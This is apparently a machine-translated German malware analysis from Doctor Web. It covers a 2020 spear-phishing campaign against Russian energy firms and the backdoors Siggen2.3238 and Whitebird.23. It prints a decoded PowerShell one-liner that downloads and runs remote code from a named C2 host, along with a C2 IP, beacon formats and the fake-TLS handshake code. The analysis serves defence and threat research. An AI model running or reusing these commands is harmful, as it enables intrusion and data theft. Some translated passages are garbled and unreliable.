Unsere Erfahrung bei der Untersuchung von Computersicherheitsvorfällen zeigt, dass E-Mails immer noch einer der häufigsten Kanäle sind, über die Angreifer zunächst in angegriffene Netzwerkinfrastrukturen eindringen. Eine unvorsichtige Aktion mit einem verdächtigen (oder nicht so verdächtigen) Brief wird zum Eintrittspunkt für weitere Infektionen, weshalb Cyberkriminelle aktiv Social-Engineering-Methoden einsetzen, wenn auch mit unterschiedlichem Erfolg.
In diesem Beitrag möchten wir über unsere jüngste Untersuchung einer Spam-Kampagne sprechen, die auf eine Reihe von Unternehmen im russischen Kraftstoff- und Energiesektor abzielt. Alle Angriffe folgten dem gleichen Szenario mit gefälschten E-Mails, und niemand schien sich viel Mühe mit dem Textinhalt dieser E-Mails zu geben.
Exploration
Alles begann Ende April 2020, als die Virenanalysten von Doctor Web eine Spam-Kampagne entdeckten, bei der Hacker ein aktualisiertes Telefonverzeichnis an Mitarbeiter mehrerer Unternehmen im russischen Kraftstoff- und Energiekomplex verschickten. Dies war natürlich kein bloßes Zeichen der Besorgnis, da das Verzeichnis nicht echt war und die .docx-Dokumente zwei Bilder von Remote-Ressourcen heruntergeladen haben.
Eine davon wurde vom Server news[.]zannews[.]com auf den Computer des Benutzers heruntergeladen. Es ist bemerkenswert, dass der Domainname der Domain des Antikorruptions-Medienzentrums Kasachstans – zannews[.]kz – ähnelt. Andererseits erinnerte die verwendete Domain sofort an eine andere Kampagne aus dem Jahr 2015 namens TOPNEWS, die eine ICEFOG-Hintertür nutzte und Trojaner-Kontrolldomänen mit der Unterzeichenfolge „news“ im Namen hatte. Ein weiteres interessantes Feature war, dass beim Versenden von E-Mails an verschiedene Empfänger für Anfragen zum Herunterladen eines Bildes entweder unterschiedliche Anfrageparameter oder eindeutige Bildnamen verwendet wurden.
Wir gehen davon aus, dass dies zu dem Zweck geschah, Informationen zu sammeln, um einen „zuverlässigen“ Adressaten zu identifizieren, der dann garantiert den Brief zum richtigen Zeitpunkt öffnet. Das SMB-Protokoll wurde zum Herunterladen des Bildes vom zweiten Server verwendet, wodurch NetNTLM-Hashes von den Computern der Mitarbeiter gesammelt werden konnten, die das empfangene Dokument geöffnet hatten.
Und hier ist der Brief selbst mit dem gefälschten Verzeichnis:
Im Juni dieses Jahres begannen Hacker, einen neuen Domainnamen, sports[.]manhajnews[.]com, zum Hochladen von Bildern zu verwenden. Die Analyse ergab, dass manhajnews[.]com-Subdomains seit mindestens September 2019 in Spam-Mailings verwendet werden. Eines der Ziele dieser Kampagne war eine große russische Universität.
Außerdem entwickelten die Organisatoren des Angriffs im Juni einen neuen Text für ihre Briefe: Dieses Mal enthielt das Dokument Informationen über die Entwicklung der Branche. Aus dem Text des Briefes ging deutlich hervor, dass der Verfasser entweder kein russischer Muttersprachler war oder absichtlich einen solchen Eindruck von sich selbst erweckte. Leider entpuppten sich die Ideen der Branchenentwicklung wie immer nur als Deckmantel – das Dokument lud erneut zwei Bilder herunter, während der Server auf download[.]inklingpaper[.]com umgestellt wurde.
Im Juli folgte die nächste Neuerung. Um die Erkennung schädlicher Dokumente durch Antivirenprogramme zu umgehen, begannen Angreifer, mit einem Passwort verschlüsselte Microsoft Word-Dokumente zu verwenden. Gleichzeitig entschieden sich die Angreifer für den Einsatz einer klassischen Social-Engineering-Technik – der Belohnungsbenachrichtigung.
Der Text der Berufung war wiederum im gleichen Stil verfasst, was beim Adressaten zusätzlichen Verdacht erregte. Auch der Server zum Herunterladen des Bildes hat sich nicht geändert.
Beachten Sie, dass in allen Fällen zum Versenden von Briefen elektronische Postfächer verwendet wurden, die auf den Domains mail[.]ru und yandex[.]ru registriert waren.
Angriff
Anfang September 2020 war die Zeit zum Handeln gekommen. Unsere Virenanalysten verzeichneten eine neue Angriffswelle, bei der Angreifer erneut Briefe unter dem Vorwand verschickten, ein Telefonbuch zu aktualisieren. Diesmal enthielt der Anhang jedoch ein schädliches Makro.
Beim Öffnen des angehängten Dokuments erstellte das Makro zwei Dateien:
- VBS-Skript %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, das zum Starten einer Batchdatei gedacht war;
- Die Batchdatei selbst %APPDATA%configstest.bat, die verschleiert wurde.
Der Kern seiner Arbeit besteht darin, die Powershell-Shell mit bestimmten Parametern zu starten. Die an die Shell übergebenen Parameter werden in Befehle dekodiert:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Wie aus den vorgestellten Befehlen hervorgeht, wird die Domain, von der die Nutzlast heruntergeladen wird, erneut als Nachrichtenseite getarnt. Eine einfache , dessen einzige Aufgabe darin besteht, Shellcode vom Command-and-Control-Server zu empfangen und auszuführen. Wir konnten zwei Arten von Hintertüren identifizieren, die auf dem PC des Opfers installiert werden können.
BackDoor.Siggen2.3238
Der erste ist BackDoor.Siggen2.3238 — war unseren Spezialisten noch nie zuvor begegnet, und auch andere Antiviren-Anbieter erwähnten dieses Programm nicht.
Dieses Programm ist eine in C++ geschriebene Hintertür, die auf 32-Bit-Windows-Betriebssystemen läuft.
BackDoor.Siggen2.3238 kann über zwei Protokolle mit dem Verwaltungsserver kommunizieren: HTTP und HTTPS. Das getestete Beispiel verwendet das HTTPS-Protokoll. Der folgende User-Agent wird bei Anfragen an den Server verwendet:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
In diesem Fall werden alle Anfragen mit folgendem Parametersatz versorgt:
%s;type=%s;length=%s;realdata=%send
wobei jede Zeile %s entsprechend ersetzt wird durch:
- ID des infizierten Computers,
- Art der gesendeten Anfrage,
- Länge der Daten im Realdata-Feld,
- die Daten.
Beim Sammeln von Informationen über das infizierte System generiert die Hintertür eine Zeile wie:
lan=%s;cmpname=%s;username=%s;version=%s;
Dabei ist lan die IP-Adresse des infizierten Computers, cmpname der Computername, username der Benutzername und version die Zeile 0.0.4.03.
Diese Informationen mit der Sysinfo-Kennung werden über eine POST-Anfrage an den Steuerungsserver unter https[:]//31.214[.]157.14/log.txt gesendet. Wenn als Antwort BackDoor.Siggen2.3238 empfängt das HEART-Signal, die Verbindung gilt als erfolgreich und die Hintertür beginnt mit dem Hauptkommunikationszyklus mit dem Server.
Ausführlichere Beschreibung der Funktionsprinzipien BackDoor.Siggen2.3238 ist in unserem .
BackDoor.Whitebird.23
Das zweite Programm ist eine Modifikation der Backdoor BackDoor.Whitebird, die uns bereits aus dem Vorfall mit einer Regierungsbehörde in Kasachstan bekannt ist. Diese Version ist in C++ geschrieben und kann sowohl auf 32-Bit- als auch auf 64-Bit-Windows-Betriebssystemen ausgeführt werden.
Wie die meisten Programme dieser Art, BackDoor.Whitebird.23 Entwickelt, um eine verschlüsselte Verbindung mit dem Kontrollserver herzustellen und die unbefugte Kontrolle eines infizierten Computers zu ermöglichen. Mit einer Pipette in ein kompromittiertes System installiert .
Das von uns untersuchte Beispiel war eine schädliche Bibliothek mit zwei Exporten:
- Google Play
- Test.
Zu Beginn seiner Arbeit entschlüsselt es die im Backdoor-Körper fest verdrahtete Konfiguration mithilfe eines Algorithmus, der auf der XOR-Operation mit Byte 0x99 basiert. Die Konfiguration sieht so aus:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Um den ständigen Betrieb sicherzustellen, ändert die Hintertür den im Feld angegebenen Wert Arbeitszeit Konfigurationen. Das Feld enthält 1440 Bytes, die die Werte 0 oder 1 annehmen und jede Minute jeder Stunde des Tages darstellen. Erstellt für jede Netzwerkschnittstelle einen separaten Thread, der die Schnittstelle abhört und auf dem Proxyserver nach Autorisierungspaketen vom infizierten Computer sucht. Wenn ein solches Paket erkannt wird, fügt die Hintertür Informationen über den Proxyserver zu ihrer Liste hinzu. Überprüft außerdem das Vorhandensein eines Proxys über WinAPI InternetQueryOptionW.
Das Programm prüft die aktuelle Minute und Stunde und vergleicht sie mit den Daten im Feld Arbeitszeit Konfigurationen. Ist der Wert für die entsprechende Minute des Tages ungleich Null, wird eine Verbindung zum Steuerungsserver aufgebaut.
Der Verbindungsaufbau zum Server simuliert den Aufbau einer Verbindung über das Protokoll TLS Version 1.0 zwischen dem Client und dem Server. Der Körper der Hintertür enthält zwei Puffer.
Der erste Puffer enthält das TLS 1.0 Client Hello-Paket.
Der zweite Puffer enthält TLS 1.0 Client Key Exchange-Pakete mit einer Schlüssellänge von 0x100 Bytes, Change Cipher Spec und Encrypted Handshake Message.
Beim Senden eines Client-Hello-Pakets schreibt die Backdoor 4 Bytes der aktuellen Zeit und 28 Bytes pseudozufälliger Daten in das Feld „Client Random“, berechnet wie folgt:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Das empfangene Paket wird an den Kontrollserver gesendet. Die Antwort (Server-Hello-Paket) prüft:
- Einhaltung des TLS-Protokolls Version 1.0;
- Übereinstimmung des vom Client angegebenen Zeitstempels (die ersten 4 Bytes des Zufallsdatenpaketfelds) mit dem vom Server angegebenen Zeitstempel;
- Übereinstimmung der ersten 4 Bytes nach dem Zeitstempel im Feld „Zufällige Daten“ des Clients und Servers.
Im Falle der angegebenen Übereinstimmungen bereitet die Hintertür ein Client-Key-Exchange-Paket vor. Dazu werden der öffentliche Schlüssel im Paket „Client Key Exchange“ sowie die Verschlüsselung IV und die Verschlüsselungsdaten im Paket „Encrypted Handshake Message“ geändert.
Die Hintertür empfängt dann das Paket vom Befehls- und Kontrollserver, überprüft, ob die TLS-Protokollversion 1.0 ist, und akzeptiert dann weitere 54 Bytes (den Paketkörper). Damit ist der Verbindungsaufbau abgeschlossen.
Ausführlichere Beschreibung der Funktionsprinzipien BackDoor.Whitebird.23 ist in unserem .
Fazit und Schlussfolgerungen
Die Analyse von Dokumenten, Malware und der verwendeten Infrastruktur lässt uns mit Sicherheit sagen, dass der Angriff von einer der chinesischen APT-Gruppen vorbereitet wurde. Angesichts der Funktionalität von Hintertüren, die im Falle eines erfolgreichen Angriffs auf den Computern der Opfer installiert werden, führt eine Infektion zumindest zum Diebstahl vertraulicher Informationen von den Computern der angegriffenen Organisationen.
Darüber hinaus ist ein sehr wahrscheinliches Szenario die Installation spezialisierter Trojaner auf lokalen Servern mit einer speziellen Funktion. Dies können Domänencontroller, Mailserver, Internet-Gateways usw. sein. Wie wir im Beispiel sehen konnten Allerdings sind solche Server aus verschiedenen Gründen für Angreifer besonders interessant.
Source: habr.com